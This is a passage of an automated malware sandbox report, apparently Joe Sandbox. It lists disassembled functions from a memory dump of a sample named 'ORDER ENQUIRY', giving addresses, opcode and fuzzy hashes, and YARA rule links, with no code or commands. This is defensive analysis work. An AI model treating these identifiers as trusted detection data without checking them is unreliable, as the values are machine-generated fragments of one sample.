Instruction Fuzzy Hash: 31B16374A006059FDF28DF99C980AABBBBAFFC4304F10459DBA5297790DB34E919CB11

Function 01AC0535 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction ID: ad717ca8d09a25d59b66fb692a78fa4cd778030c44965ba92a8ea2734db7dd1e
Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction Fuzzy Hash: 2FB12535600646DFDB29DBA8C950BBEBBF6EF88700F194199E6429B385D730ED41CB90

Function 01AB83C0 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02ffbf8b2d951ceb74314e4a365921b56250157eaf294bfa5bec4bc5d286c705
Instruction ID: cbb8e8543e58cf97fef9d1218aa772733e800db5f89f07cbcd7417a189730c70
Opcode Fuzzy Hash: 02ffbf8b2d951ceb74314e4a365921b56250157eaf294bfa5bec4bc5d286c705
Instruction Fuzzy Hash: 3BC148751083818FE764DF29C484BABB7E9FF88304F45496DEA8987291D778E904CF92

Function 01AAC427 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f6f17589fd667f34e468a03b7d35c314bfd741d5d9103b0e00176e48b08b201
Instruction ID: b5468913fed293aac6728aebba6192a747ec38ba72ee9f57d02922613a2fa6ca
Opcode Fuzzy Hash: 9f6f17589fd667f34e468a03b7d35c314bfd741d5d9103b0e00176e48b08b201
Instruction Fuzzy Hash: 5AB19670A002668BEB25DF68C990BA9B7F5EF44710F4485E9E54AE7285EB30DDC5CF20

Function 01ADE5E7 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98c307b824e78cfcb9a4eda3b7115b1d3887d0583e3dec20b2c6e3e4a91e66ff
Instruction ID: 52e2a8ca94682bf72f7d156f9fb43bcc6ee0a7ea9bbfd2321ea3d832a56a8a85
Opcode Fuzzy Hash: 98c307b824e78cfcb9a4eda3b7115b1d3887d0583e3dec20b2c6e3e4a91e66ff
Instruction Fuzzy Hash: 37A10731E00A199FEB26DB98C944BBEBBB4FF00714F060199EA12AB2D5D7749D44CBD1

Function 01AF0185 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4ca6247fb058385ec507e55060d44c034a36c83bf889060db404128e9327c81
Instruction ID: 473bbe5ca56b8cce8e5cc5fee56230615d1f04f1c6f7ea8743f4c0b8d297e1b0
Opcode Fuzzy Hash: a4ca6247fb058385ec507e55060d44c034a36c83bf889060db404128e9327c81
Instruction Fuzzy Hash: 1AA1A170B006269BDB25DFA9C690BAAB7B2FF54314F14412DFB4997283DB34E805CB50

Function 01B84500 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f312fcffb42e39ea510fab3a8f8cbdb40fa30e35fc0eba988345f44974f8b5f8
Instruction ID: bed8a65f94985247f59e53c76c121fadb0a88feb35eda0f22b0eb4a42f6130ca
Opcode Fuzzy Hash: f312fcffb42e39ea510fab3a8f8cbdb40fa30e35fc0eba988345f44974f8b5f8
Instruction Fuzzy Hash: 8AA1DF72A14212DFC719EF18CA80B6ABBE9FF58B04F4505ADF5459B651D734EC00CB91

Function 01B82B57 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
Instruction ID: 158000ab35018f22ffe3d8e0337a6a991d96d355be90f518036d8c0f557be5b5
Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
Instruction Fuzzy Hash: E5B14771E0061ADFDF29DFA9C980AADBBB5FF48710F1481A9E914A7390D730A941CF94

Function 01B360E0 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a2ee64800cbb5a10e2ffb8858827c51fa8bc90c9fd19062c17626ae9b78a638
Instruction ID: eb3138def3ee3b581c25cd72cd52f59e1981fdf0badf43fc6ee695cb88d88817
Opcode Fuzzy Hash: 1a2ee64800cbb5a10e2ffb8858827c51fa8bc90c9fd19062c17626ae9b78a638
Instruction Fuzzy Hash: BE916371D00616BFDF19CF69D884BAEBBB5EF88710F154199E610EB241D734DA109BA0

Function 01ACE3F0 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94fcd6c8ddc82e0ad06d60a8fe07cf597edb2eb0db6021877bfcb21a02b572db
Instruction ID: 67e9112828d309bd240a893f4eb946070e0e589ec7191df975b454a77c956967
Opcode Fuzzy Hash: 94fcd6c8ddc82e0ad06d60a8fe07cf597edb2eb0db6021877bfcb21a02b572db
Instruction Fuzzy Hash: DD913671A00656CBEB28DB6CC540BBABFB2EFA4B14F0940ADED059B285EB34D901C751

Function 01B06ACC Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ccc598efc03b2e6ff109b5de3705234dd2ffbe79c1fd214967e10e007a524ee
Instruction ID: 5f0ec4be00d843318c86c96b497800e5a78e59d50d6c6fe624dfc5f1580f42e6
Opcode Fuzzy Hash: 1ccc598efc03b2e6ff109b5de3705234dd2ffbe79c1fd214967e10e007a524ee
Instruction Fuzzy Hash: 8281B4B1E006169FDB29CF69C940ABEBBF9FB48700F04852EE545E7680E734D951CB94

Function 01B7AB40 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
Instruction ID: e2ce7ed67deeb7760dd5aedff69827ec2ca5d48fdf509c13157ee9ac356c8c93
Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
Instruction Fuzzy Hash: A2815371A002099FDF5DCF69C890ABEBBB6FF84310F1885A9D9259B385DB74E901CB50

Function 01AEE284 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a344f169468b429762ea7246f8b0abed5a0aa9d10d5cbca4306b2d7a16e0d1c7
Instruction ID: 598d518fdbeaaaab0c20b5a37a3711ad3326194c1a11ce2fade5abfbd8ac64a3
Opcode Fuzzy Hash: a344f169468b429762ea7246f8b0abed5a0aa9d10d5cbca4306b2d7a16e0d1c7
Instruction Fuzzy Hash: FA817E71A0061AAFDB25CFA9C984BEEBBF9FF48314F14442AE559A7250D730AC45CB60

Function 01ACC640 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cdcce4730260469ee9f8c640e9d7cb08d4d56675502d7fa7cdb4632551bf4a6
Instruction ID: 0293d68a7c4f59416f808b970e400929fab561e10792905bc556de1547d2e256
Opcode Fuzzy Hash: 3cdcce4730260469ee9f8c640e9d7cb08d4d56675502d7fa7cdb4632551bf4a6
Instruction Fuzzy Hash: 9D71D1B5D00629DBCB29CF59C9907BEBBB0FF48B10F99415EE856AB358D3349800CB90

Function 01B647A0 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc183d85abbb87e3ce22e23c38d9267c055ad12a6ece07c45dae79b1e2f21ca6
Instruction ID: 6963e833d24323bda1078df668cae617287dbc08e18f64827c20a622024be297
Opcode Fuzzy Hash: bc183d85abbb87e3ce22e23c38d9267c055ad12a6ece07c45dae79b1e2f21ca6
Instruction Fuzzy Hash: AC71B4B1900605EFDB28CFA9DA41A9EBBFCFFA4340F44419AE654A7298D735C940CF54

Function 01AC260B Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48783e4dfa36c33021ca4f9bfff746acc1083354edd3d2ad312bfbce70af6638
Instruction ID: 0a95347e891eba167b8e8e652e102f86dc0b28827a9a66f3b7c680cb0530511b
Opcode Fuzzy Hash: 48783e4dfa36c33021ca4f9bfff746acc1083354edd3d2ad312bfbce70af6638
Instruction Fuzzy Hash: E471D0356042428FD716DF2CC480B6AB7E5FF84710F0985AEE899CB352DB78D845CBA1

Function 01B3035C Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
Instruction ID: a88496d2f4d3e0aab06816e22784e51410249c06749e97dcdfa377b109113857
Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
Instruction Fuzzy Hash: 32716D71A00609EFDF15EFA9C984AEEBBB8FF98700F104569E505E7290DB30EA15CB50

Function 01B462A0 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ed44213b4e9b34a5549cb22c70b4cf0a4c5620bc7501bab8bdc43de7b3a0eaa
Instruction ID: 827ed4185a2e17c93e18735b60f7a65e83fe576700a1ba6c85712492e20b45a4
Opcode Fuzzy Hash: 4ed44213b4e9b34a5549cb22c70b4cf0a4c5620bc7501bab8bdc43de7b3a0eaa
Instruction Fuzzy Hash: 0B710232200701AFEB3ADF18C984F6ABBA6EF41720F14859CE655972A0D774E944EB50

Function 01AB8AA0 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7462aa2d7f697e2aff33462977040424ac591118ed5a0d2cd630a8b967c8c20e
Instruction ID: 7de62a90b9d3692672525bedfc86c274af338ec474154a8b4ab62f214053da97
Opcode Fuzzy Hash: 7462aa2d7f697e2aff33462977040424ac591118ed5a0d2cd630a8b967c8c20e
Instruction Fuzzy Hash: 4C819072A04345CFDB28CF9CD584BEDB7B9EB48310FAA41ADD9046B286D7759D40CB90

Function 01B88324 Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7ec6fd6c023581763888fece98c64d5301c1765c1b65bc9e86ff0aeb9fa58eb
Instruction ID: 870caada9641c07e4b088f45495280ecc677036086cb07ac5f3d15639f0c61b3
Opcode Fuzzy Hash: a7ec6fd6c023581763888fece98c64d5301c1765c1b65bc9e86ff0aeb9fa58eb
Instruction Fuzzy Hash: 88710A71E0020AAFDF15DF94C981FEEBBB9FF04750F504269F621A6290D774AA05CBA0

Function 01B6A250 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46d278a52730fc8e8d25c8ac72642653bc0628bfc48fe07ac16667f1b09c9761
Instruction ID: 469fc695209ae467a5c52835a7c470c78ea8238d2bbf134fc5aea26f5fce78d7
Opcode Fuzzy Hash: 46d278a52730fc8e8d25c8ac72642653bc0628bfc48fe07ac16667f1b09c9761
Instruction Fuzzy Hash: 0651CF72504712AFDB15DA78C894B5BBBECEBD8750F0009A9BA40EB150D778ED05C7A2

Function 01B58350 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44817ba1a4536406c4823e780f4ebd969573c113deec48f766bc99efe4b2b5b6
Instruction ID: be8ef505c2c12eeb37cc065aa7997f0ef5136deb594a0d96ac7d8d27da2f3ec2
Opcode Fuzzy Hash: 44817ba1a4536406c4823e780f4ebd969573c113deec48f766bc99efe4b2b5b6
Instruction Fuzzy Hash: 8E51DE709007059FDB69CF5AC880B6BFBF8FF54710F10465EEA52576A1C7B0A545CB50

Function 01AEE443 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e864d3952e8d806791593e5274d3f281208a0d5a3524c4f3a800358a6e499eb2
Instruction ID: 4d03e22b1ec1f3ab02054ac1fffdde8276d0ee361b1ba0bd4d8465f8b6bd8368
Opcode Fuzzy Hash: e864d3952e8d806791593e5274d3f281208a0d5a3524c4f3a800358a6e499eb2
Instruction Fuzzy Hash: E6519E31200A15EFCB22EFAACA84EAAB7F9FF14744F40046EE50597261D734E944CB60

Function 01B54180 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08fc8a4b25bf0f49e3a60fb0e16e107fef56b12d51f68ec53295bbfedd139179
Instruction ID: 0717cb5031704b8139eb7b6c4a639871458ef1a5da40cfa0a4711c54ecd70a10
Opcode Fuzzy Hash: 08fc8a4b25bf0f49e3a60fb0e16e107fef56b12d51f68ec53295bbfedd139179
Instruction Fuzzy Hash: 045136716083029FD798DF29C980A6BBBE5FBC8204F44497DF999C7261E730D946CB52

Function 01AD45B1 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
Instruction ID: f50bb2a4b920a751153a068aa3d4e5b05a99b4a6734d9c195f551125c098c4e0
Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
Instruction Fuzzy Hash: EC51AF71E0061AABDF15DF98C540BEEBBB5EF49750F054069EA06EB640E734DE44CBA0

Function 01B3E9E0 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
Instruction ID: b023c32aca32e355945f9daa4ad2834ccc908c4e7be664a8e7cc1af530cb649f
Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
Instruction Fuzzy Hash: AB51B971D0020AEFDF2A9B94C9C0BAEBB75EB80314F154696E611A7190E730DD558BA0

Function 01B78B28 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 401b7f0dd59e7d002a046d4bd017b76aee0ca21e6e72098847195ed9999484b4
Instruction ID: a7f6b6fee4a04b99b29dadc8cfaaec1142a8f751672bcdb9faa7ac019007815e
Opcode Fuzzy Hash: 401b7f0dd59e7d002a046d4bd017b76aee0ca21e6e72098847195ed9999484b4
Instruction Fuzzy Hash: FB41F7707016019BEB2DDB2DC898F7BBB9AEF94220F088299E975C7390DB31D841C691

Function 01B3CBF0 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42bad84aeea878d6c3958ffce80735be552f1f3f699e33055037484d18138a73
Instruction ID: a9f68e2417738242ba34785bb1b9c76cd36a12d2928980c69184794236c11fe2
Opcode Fuzzy Hash: 42bad84aeea878d6c3958ffce80735be552f1f3f699e33055037484d18138a73
Instruction Fuzzy Hash: 21519CB190021ADFCB24DFA9C98499EBBB9FF88314B95455AE505B3301DB34AD11CFD0

Function 01AEA430 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70c7f97cf10db960cd38e7084ddabd06c6b65cc4f9a83f640463c1ccfbb4310f
Instruction ID: d76caf7bf24d24e467622fe15bf91dccf6cc0eaa00bb25d1da544e806176d7ed
Opcode Fuzzy Hash: 70c7f97cf10db960cd38e7084ddabd06c6b65cc4f9a83f640463c1ccfbb4310f
Instruction Fuzzy Hash: 984137717403129BDB3EEF68D986FAA77B4EB94708F44006DFE069B246D7719804D7A0

Function 01B7A9D3 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
Instruction ID: fc375f1d05ebdaa4cae4874aa8656483ee7eddeb173458f571fa92fca24d6368
Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
Instruction Fuzzy Hash: 0541E9716007169FDB6DDF78C980A6EB7A9FF90210B0946AEE96287340EB30ED14C790

Function 01AE01F8 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e8b97293308fb3f90b97b2cab68ae4958d3154dc0a4023fe4a6d956da28939a
Instruction ID: bf41cce94981cc8d921ac655018adba91b9194349f3ebcefa4d4032a01e743aa
Opcode Fuzzy Hash: 8e8b97293308fb3f90b97b2cab68ae4958d3154dc0a4023fe4a6d956da28939a
Instruction Fuzzy Hash: 5D41DD32A0121A9BDB15DF98C644AEEBBF4FF48700F18816AF915F7240D7B49C42CBA4

Function 01ADEBFC Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff59d1138320aadd76e236b3d06e23770e05082d03889921d88af86c885c3bc9
Instruction ID: 115faa958165001c2ee7c675e40fa43f20015064d1bbc4d374a94ac933cf21ba
Opcode Fuzzy Hash: ff59d1138320aadd76e236b3d06e23770e05082d03889921d88af86c885c3bc9
Instruction Fuzzy Hash: 1541AF712047029FDB24DF28C984A6BB7F9FF88214F45486EE557CB215EB35E849CB90

Function 01AF2750 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
Instruction ID: 9f998bd27bb9f99d702bae34b7a622dbe9801f3f4a37a0735d16271c84350220
Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
Instruction Fuzzy Hash: E3516C75A00625CFCB19CFA9C480AADF7B2FF88710F2481A9D929A7751D730EE45CB90

Function 01AB6154 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2e5c2f8704afd03d68a600eeae80c2a0b3b351ec483225dd78e65bcb521377b
Instruction ID: befe837f54c8ee11db17d66950209993a8be16e54e1ad70e3fce978fdb18bdc5
Opcode Fuzzy Hash: c2e5c2f8704afd03d68a600eeae80c2a0b3b351ec483225dd78e65bcb521377b
Instruction Fuzzy Hash: 4851E6B0D00246DBEB299B68CD40BE8BBB5FF15314F5882EAE519972C2E73499C1CF40

Function 01AB0BCD Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1504a9a5e4ccf0a54f1467bc3082cf54ae393c115c3baf4fd4deee86383fa869
Instruction ID: 67e9a9ca4bde115c35f3b7304483f1ae316e076e22d1311c7afa8f01f2d7b072
Opcode Fuzzy Hash: 1504a9a5e4ccf0a54f1467bc3082cf54ae393c115c3baf4fd4deee86383fa869
Instruction Fuzzy Hash: A7418571A00268DBDB21DF68CA80BEE7BB8EF45750F0505A9E908AB242D774DE84CF51

Function 01B7866E Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
Instruction ID: fcce3889ff3aa68e4da09e66478dda83c30348049da07c1e36a6847f33601e34
Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
Instruction Fuzzy Hash: 4B418575B00105ABDF19DF99CC98AAFBBBAEF88610F1440A9E915E7351DB70DD0187A0

Function 01AB0887 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86355254d38bc14d0b77a24923cf3113e661420b6900dd0dfd2b9303880ec3be
Instruction ID: c456defe6b70f50b71a4ca9ea86ef69e7a370d4bcbf7eb9c62e783666a7a1a7c
Opcode Fuzzy Hash: 86355254d38bc14d0b77a24923cf3113e661420b6900dd0dfd2b9303880ec3be
Instruction Fuzzy Hash: 5841E2B06007819FE325CF68C680A63BBF9FF48314B148A6EE557C7A52E730E845CB90

Function 01ADA470 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

